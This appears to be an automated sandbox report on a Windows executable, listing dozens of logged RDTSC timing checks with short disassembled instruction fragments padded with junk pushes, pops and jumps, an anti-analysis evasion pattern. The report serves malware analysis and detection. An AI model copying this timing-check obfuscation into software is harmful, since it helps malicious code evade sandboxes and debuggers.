                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 61A1C2 second address: 61A1D9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jbe 00007FC2192E8586h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FC2192E858Bh 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 61A38C second address: 61A392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 61A392 second address: 61A396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 61A396 second address: 61A3A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC218F099B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 61ED4D second address: 61ED51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5E73DD second address: 5E73E2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5E73E2 second address: 5CE04E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007FC2192E8588h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 and edi, 62FC4A9Fh 0x0000002a call dword ptr [ebp+136329EAh] 0x00000030 push eax 0x00000031 push edx 0x00000032 push ebx 0x00000033 jmp 00007FC2192E858Ah 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5E74AD second address: 5E74B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5E77BF second address: 5E77C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5E77C3 second address: 5E77C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5E7DC3 second address: 5E7DC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5E7DC7 second address: 5E7DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5E85CD second address: 5CEBC6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC2192E8588h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007FC2192E8588h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 mov edi, dword ptr [ebp+13632EE9h] 0x0000002d call dword ptr [ebp+13631D1Dh] 0x00000033 pushad 0x00000034 jmp 00007FC2192E858Ch 0x00000039 jg 00007FC2192E85A4h 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007FC2192E8596h 0x00000046 ja 00007FC2192E8586h 0x0000004c rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5CEBC6 second address: 5CEBCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5CEBCA second address: 5CEBEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007FC2192E8597h 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5CEBEB second address: 5CEC13 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC218F099B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC218F099C8h 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5CEC13 second address: 5CEC3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E8590h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC2192E8591h 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5A42BF second address: 5A42C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 61DFDA second address: 61DFE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 61DFE0 second address: 61DFE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 61E46D second address: 61E47D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC2192E858Ah 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 61E719 second address: 61E71D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5CEBA4 second address: 5CEBC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FC2192E8596h 0x0000000b ja 00007FC2192E8586h 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 61E869 second address: 61E874 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 61E874 second address: 61E879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 61E879 second address: 61E88A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FC218F099BAh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6203D3 second address: 6203D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6203D8 second address: 6203E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC218F099B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6238D0 second address: 6238DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FC2192E8586h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 626091 second address: 626097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 626097 second address: 6260D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop eax 0x00000009 jne 00007FC2192E85A1h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC2192E858Fh 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6260D6 second address: 6260DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 62A7BC second address: 62A7C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 62A7C2 second address: 62A7CC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC218F099B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 62A7CC second address: 62A7DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FC2192E8586h 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 62A90D second address: 62A937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC218F099C8h 0x00000009 jmp 00007FC218F099BDh 0x0000000e popad 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 62A937 second address: 62A950 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC2192E8593h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 62A950 second address: 62A954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 62A954 second address: 62A958 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 62AD48 second address: 62AD56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC218F099BAh 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 62AD56 second address: 62AD79 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC2192E8586h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FC2192E8594h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 62AD79 second address: 62AD85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 62B1AC second address: 62B1B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 62B1B0 second address: 62B1C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FC218F099BEh 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 62B1C9 second address: 62B1CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 62B1CF second address: 62B1D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 62B42E second address: 62B45F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC2192E8586h 0x0000000a popad 0x0000000b jng 00007FC2192E859Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 ja 00007FC2192E8586h 0x00000019 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 62B786 second address: 62B78A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 63230A second address: 632310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 630FFD second address: 631001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 631001 second address: 63102A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E8597h 0x00000007 ja 00007FC2192E8586h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007FC2192E8586h 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 631466 second address: 63146C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 63190E second address: 631918 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC2192E8586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 631918 second address: 631948 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC218F099C2h 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 631C16 second address: 631C3D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FC2192E8593h 0x0000000c js 00007FC2192E8592h 0x00000012 jbe 00007FC2192E8586h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6321BC second address: 6321C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 630A0C second address: 630A10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 630A10 second address: 630A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FC218F099D6h 0x0000000c jmp 00007FC218F099C3h 0x00000011 jmp 00007FC218F099BDh 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 630A3C second address: 630A78 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC2192E85A1h 0x00000008 jmp 00007FC2192E8599h 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007FC2192E858Eh 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jnp 00007FC2192E8586h 0x0000001f rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6348E7 second address: 6348EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6348EB second address: 6348EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6348EF second address: 6348F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6348F5 second address: 6348FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6348FB second address: 634908 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC218F099B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 634908 second address: 634914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 634914 second address: 634918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 634918 second address: 63491E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 637366 second address: 63737E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC218F099C4h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 63737E second address: 637394 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC2192E8586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC2192E858Ch 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 637394 second address: 63739C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 63739C second address: 6373A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6377C0 second address: 6377C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6377C6 second address: 6377D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E858Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 63C421 second address: 63C43F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC218F099C6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 64179B second address: 6417AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jp 00007FC2192E8586h 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 640943 second address: 640947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 640E70 second address: 640E76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 640E76 second address: 640EA4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC218F099B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC218F099C9h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 js 00007FC218F099C8h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 640EA4 second address: 640EB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2192E858Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 640EB8 second address: 640EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 641028 second address: 641032 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC2192E8586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 641032 second address: 641037 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 649460 second address: 649466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 649466 second address: 649481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC218F099C6h 0x00000009 popad 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 649481 second address: 64949D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC2192E8596h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 64949D second address: 6494A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 64996D second address: 64997F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007FC2192E8586h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007FC2192E8586h 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 649AE2 second address: 649AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 649AEA second address: 649AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 649AEF second address: 649B18 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 je 00007FC218F099B6h 0x0000000b pop esi 0x0000000c ja 00007FC218F099BCh 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 pushad 0x00000016 push eax 0x00000017 pop eax 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push edi 0x00000020 pop edi 0x00000021 push edi 0x00000022 pop edi 0x00000023 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 649C68 second address: 649C6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 64A7D8 second address: 64A7EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 65078B second address: 6507AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E8596h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6507AA second address: 650810 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC218F099C9h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007FC218F099C7h 0x00000014 jmp 00007FC218F099C2h 0x00000019 popad 0x0000001a pushad 0x0000001b jnc 00007FC218F099B6h 0x00000021 jmp 00007FC218F099BBh 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 push edx 0x0000002a pop edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
